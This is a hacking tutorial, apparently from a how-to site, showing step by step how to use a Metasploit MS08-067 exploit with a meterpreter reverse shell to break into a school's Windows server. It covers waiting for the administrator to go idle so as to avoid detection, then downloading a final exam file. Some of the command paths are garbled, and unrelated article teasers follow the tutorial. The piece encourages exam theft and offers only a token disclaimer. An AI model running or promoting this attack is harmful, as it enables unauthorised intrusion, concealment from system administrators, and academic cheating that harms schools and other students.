Hack Like a Pro: How to Hack Your School’s Server to Download Final Exam Answers


Welcome back, my fledgling hackers!

If you’re like most aspiring hackers, at one time or another you’ve probably spent too much time playing Call of Duty and not enough time preparing for your final exams.

So for today, we’ll look at how to break into your school’s server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

This hack uses Metasploit along with its meterpreter, so let’s get after those finals and fire up our Metasploit in BackTrack!

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

WARNING (Disclaimer):

Of course, this is for demonstration/entertainment purposes only. Please do not break into your school’s server and steal exams as it’s illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

Step 1: Find That Proper Exploit

Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

In our case here, our school is running a Windows 2003 Server that stores all the department’s exams and records. So, let’s use the /exploit/windows/smb/ms08_067_netapi. To find it, type:

  • msf > search ms08

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

  • msf > use /exploit/windows/smb/ms08_067_netapi

Step 2: Set the Payload

Now we need to set our payload. In this case, we’ll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

  • msf > set payload /windows/meterpreter/reverse_tcp

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Let’s take a look next at the options that we need for this exploit/payload combination by typing:

  • msf > show options

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Step 3: Set the Options

Now we can see that we need to set the RHOST and the LHOST.

  • msf >set LHOST 192.168.1.114
  • msf >set RHOST192.168.1.108

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Step 4: Exploit That Server!

Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

  • msf > exploit

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Step 5: Check to See if the Admin Is Using the System

We should now have a meterpreter shell on the school’s server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

  • meterpreter >idletime

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let’s wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!

Once we’re safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let’s type lpwd (both pwd and lpwd will work).

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Meterpreter responds with the / symbol indicating that we’re in the root directory.

Step 6: Find the Final Exams

We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That’s probably where the exams are! Let’s change directories to Concord University:

  • meterpreter c:ConcordUniversity

Note that we need to use a double to navigate to this directory. This is necessary and critical.

Now we’re in ConcordUniversity, we can get a directory listing by typing:

  • meterprter > ls

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we’re looking for the Biology final, let’s navigate to the Biology directory.

  • meterpreter > cd biology

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Voilà! There’s the final exam for our biology class.

Step 7: Download the Final

Meterpreter has a built-in download feature, so all we need to do is type:

  • meterpreter > download C:biologyexamsFinalExam

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash () in denoting the directory of the file we want to download.

When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Now we are guaranteed a 95% (don’t get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.

Failed exam and Multiple choice photo via Shutterstock

Eco ??Friendly Road Construction

”’Solid Roads international Ltd”’ is a construction company centered on creation and development of eco- friendly, low cost products and technologies for reparation and improvement of roads. // Continue reading

How to Download Youtube Videos for Android

This video teaches you what is the Best youtube video downloader for Android and How to download youtube videos with it on your Android Step 1: Please enable JavaScript to watch this video.// Continue reading

How to Virtually Tour Mexico’s Chichen Itza with Simulated Archaeological Digs

Please enable JavaScript to watch this video.// f you’ve ever visited Mayan ruins in Mexico, chances are high that you’ve been to Chichen Itza. It was one of the largest Mayan cities and is now the most visited arcahelogical site in Mexico. Continue reading

How to Download & Play Game Boy Advance ROMs on Your iPad or iPhone??No Jailbreak Required

If you want to play games that aren’t in the iOS App Store, Apple makes it pretty tough for you. Usually the only solution is jailbreaking, something most avoid because it will void the warranty and may cause potential bricking issues. Continue reading

How to Set a Panoramic Photo as a Live Wallpaper in iOS 7 on Your iPhone

Panoramic live wallpapers for the iPhone If the first beta version of iOS 7 is indicative of the imminent public release of Apple’s revamped mobile operating system, the answer is a resounding yes. Continue reading

How to Use "SET", the Social-Engineer Toolkit

Welcome back my social engineers/hackarians! Today we’ll be looking into a fantastic piece of software, The Social-Engineer Toolkit or just SET for short. SET is designed, Developed and used by several Social-engineers. So.. Continue reading

How to Monitor App Data Usage in iOS 7 & Disable Data-Hungry Apps from Sucking Up Your Money

With the majority of smartphone carriers no longer offering unlimited data plans for the iPhone, monitoring how much mobile data you use is a key element to saving money on your phone bill. Continue reading

Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 4

Welcome back, my budding hackers! I began this series on Linux basics because several of you have expressed befuddlement at working with BackTrack on Linux. As a hacker, there is no substitute for Linux skills. Linux beginners are often faced with the issue of how to find files and programs, especially considering the radically different directory structure as compared to Mac OS or Windows. Continue reading

How to Use AirDrop to Share Photos, Contacts, & Other Files in iOS 7

Sharing just got a whole lot easier in the new iOS 7. Apple has decided to integrate AirDrop, the local vicinity file-sharing service found in Mac OS X, into the latest version of iOS. With AirDrop, you can share pictures, contacts, notes, and more between two iPhones without the need for a wireless network. Continue reading